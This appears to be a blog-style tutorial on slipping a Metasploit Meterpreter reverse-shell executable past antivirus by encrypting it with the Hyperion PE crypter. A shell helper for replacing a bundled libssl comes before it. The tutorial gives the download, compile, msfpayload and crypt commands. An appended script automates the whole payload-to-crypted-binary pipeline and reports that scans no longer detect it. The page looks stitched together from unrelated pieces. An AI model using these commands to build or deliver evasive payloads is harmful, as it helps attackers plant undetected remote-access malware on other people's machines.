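# Added example, not from the original post: swap a bundled shared library for a
# symlink to the system copy, keeping a backup so the change can be reverted.
# All paths in the usage comment are placeholders, not the post's actual paths.

# loaded_libssl BINARY: which libssl the dynamic loader resolves for BINARY (needs ldd)
loaded_libssl() {
    ldd "$1" 2>/dev/null | awk '/libssl/ { print $3 }'
}

# link_to_system BUNDLED SYSTEM
# Moves BUNDLED to BUNDLED.bak (once), then points BUNDLED at SYSTEM.
# Returns 1 if SYSTEM does not exist, 2 if a backup is already present.
link_to_system() {
    _bundled=$1
    _system=$2
    [ -f "$_system" ] || { echo "system library not found: $_system" >&2; return 1; }
    if [ -e "$_bundled.bak" ]; then
        echo "refusing to overwrite existing backup: $_bundled.bak" >&2
        return 2
    fi
    # Back up only a real file; an existing symlink is simply replaced.
    if [ -f "$_bundled" ] && [ ! -L "$_bundled" ]; then
        mv "$_bundled" "$_bundled.bak" || return 1
    fi
    ln -sf "$_system" "$_bundled"
}

# restore_bundled BUNDLED: undo link_to_system by putting the backup back
restore_bundled() {
    [ -e "$1.bak" ] || { echo "no backup for $1" >&2; return 1; }
    rm -f "$1"
    mv "$1.bak" "$1"
}

# link_target PATH: print where PATH points, or nothing if it is not a symlink
link_target() {
    [ -L "$1" ] && readlink "$1"
}

# Usage (paths are placeholders; use the library the msfupdate error names):
#   loaded_libssl /path/to/msf/ruby
#   link_to_system /path/to/msf/bundled/libssl.so.0.9.8 /usr/lib/libssl.so.0.9.8
#   msfupdate
# and if anything breaks:
#   restore_bundled /path/to/msf/bundled/libssl.so.0.9.8
```

Keep the soname identical on both sides (libssl.so.0.9.8 to libssl.so.0.9.8); pointing a binary at a different OpenSSL ABI will give you a different loader error instead of a fixed one.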

Enjoy hacking, enjoy exploitation. :)

Bypassing Antivirus with PE Crypters by Shubham Mittal (@k@ Upgoingstaar)

Most of the time when we do a penetration test, we face a super cool AV that stops us from executing our lovely EXEs, shellcode, etc.

I was looking around the same problem, and from a presentation by Dave Kennedy at DerbyCon I picked up something quite useful. He mentioned "shellcodeexec" and "PE crypters". Digging around, I found that shellcodeexec is a small utility that injects shellcode into a process and executes it; the idea is that when there is no file on disk, what signature is the AV going to match? However, shellcodeexec itself gets caught nowadays, so I would not suggest going for it.

On the other hand, the PE crypter from the Nullsecurity team encrypts a binary with a neat approach and can thus be used to bypass AV. The project goes by the name Hyperion and is a properly working way to mess with AVs. So let's start.

AVs have become good at detecting the templates we encrypt our EXEs with, and likewise the decryption stub that walks to the real payload offset, so those approaches ended in "Detection". Hyperion does not scramble the payload with a fixed stub; it encapsulates it. The executable is encrypted with AES-128, but only a few bytes of the key are random, the rest are fixed, and the key itself is not stored in the file. At run time the stub brute-forces those bytes before decrypting and launching the payload. That costs time, and more so the longer the random part of the key is, so we keep it short and everything goes fine. That, in short, is what the Hyperion PE crypter does: a deliberately weak AES-128 key encapsulates the payload and is simply brute-forced at execution time. If you want a hardcore look, read the research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf).

Anyway, for the super cool guys, that was enough. But since only the source files are available for now, it can be a little troublesome for those new to this :P, so let me walk you through it. First of all, choose your platform; I prefer Linux all the way, but it's your system and your choice.

Next, download the project from nullsecurity.net, or use:

wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip

Unzip it:

unzip Hyperion-1.0.zip

Change into the extracted directory and compile the crypter with the MinGW g++ running under Wine (this assumes MinGW is installed in the default Wine prefix, /root/.wine):

cd Hyperion-1.0

wine /root/.wine/drive_c/MinGW/bin/g++.exe Src/Crypter/*.cpp -o shubham.exe

Once you have built the crypter executable, shubham.exe in this case, you can start playing around with EXEs. I am generating an msfpayload reverse-connection executable; once it is crypted with Hyperion it should get past the AV and still send the reverse connection back.

Create the payload:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe

Scan it.
Once the payload is ready, we scan it first (without crypting) to get a baseline detection result.

Let's crypt it with Hyperion:

wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe

ls -l

Scan it.
No detection.

Execute it.
As soon as you run it, the stub starts brute-forcing the key, which pushes CPU usage to 100%.

Enjoy it.
As soon as the brute force finishes, CPU usage drops back to normal and a Meterpreter session comes in.
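The steps above (generate, crypt, scan, execute) are done by hand in the post. As an added example, not the post's own commands and not part of Hyperion, here is a script that drives the same pipeline and adds the sanity check a practitioner wants before uploading anything to a scanner: that the crypted output is still a well-formed PE (MZ header, PE signature at e_lfanew) and that its bytes actually differ from the input. msfpayload, wine, the shubham.exe name and the LHOST/LPORT defaults are assumptions taken from the post; run with no arguments and it exercises the checks on constructed PE-shaped sample files, so it works offline.

```shell
#!/bin/sh
# Added example, not part of the original post or of Hyperion: drive the
# msfpayload -> Hyperion -> check steps from one script and verify that the
# crypted output is still a well-formed PE whose bytes differ from the input.
# Tool names, paths and the LHOST/LPORT defaults are assumptions.

# is_pe FILE: return 0 if FILE has an MZ header and "PE\0\0" at e_lfanew
is_pe() {
    _f=$1
    [ -f "$_f" ] || return 1
    # DOS header magic "MZ" at offset 0
    [ "$(od -An -c -N2 "$_f" | tr -d ' ')" = "MZ" ] || return 1
    # e_lfanew: 4-byte little-endian offset of the PE header, stored at 0x3c
    set -- $(od -An -tu1 -j60 -N4 "$_f")
    [ $# -eq 4 ] || return 1
    _off=$(( $1 + $2 * 256 + $3 * 65536 + $4 * 16777216 ))
    # PE signature 50 45 00 00 must sit at that offset
    [ "$(od -An -tx1 -j"$_off" -N4 "$_f" | tr -d ' ')" = "50450000" ]
}

# crypt_changed IN OUT: both must be PEs and OUT must differ from IN
crypt_changed() {
    is_pe "$1" || { echo "input is not a PE: $1" >&2; return 1; }
    is_pe "$2" || { echo "output is not a PE: $2" >&2; return 1; }
    if cmp -s "$1" "$2"; then
        echo "output is byte-identical to input; crypting did nothing" >&2
        return 1
    fi
    return 0
}

# make_fake_pe PATH TAIL: constructed sample, a minimal PE-shaped file
# (MZ, 58 zero bytes, e_lfanew = 0x40, "PE\0\0", then TAIL) for offline testing
make_fake_pe() {
    {
        printf 'MZ'
        dd if=/dev/zero bs=1 count=58 2>/dev/null
        printf '\100\000\000\000'
        printf 'PE\000\000'
        printf '%s' "$2"
    } > "$1"
}

# With LHOST (and optional LPORT) given, run the real pipeline from the post.
# Without arguments, self-test the checks on constructed samples.
if [ $# -ge 1 ]; then
    LHOST=$1
    LPORT=${2:-4444}
    msfpayload windows/meterpreter/reverse_tcp LHOST="$LHOST" LPORT="$LPORT" X > msf1.exe
    wine ./shubham.exe msf1.exe msf2.exe
    crypt_changed msf1.exe msf2.exe && sha1sum msf1.exe msf2.exe
else
    _tmp=$(mktemp -d)
    make_fake_pe "$_tmp/in.exe"  AAAA
    make_fake_pe "$_tmp/out.exe" BBBB
    crypt_changed "$_tmp/in.exe" "$_tmp/out.exe" && echo "self-test: PE check and diff OK"
    rm -rf "$_tmp"
fi
```

The sha1sum line gives you two hashes to keep with your notes: the uncrypted one that the scanner flagged and the crypted one that it passed, so a later "no detection" result can be tied to the exact file that was tested.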

I hope this was OK for you and that you enjoyed it. My next post will be about another way to bypass antiviruses.

Stay Focused; & Keep exploiting. :)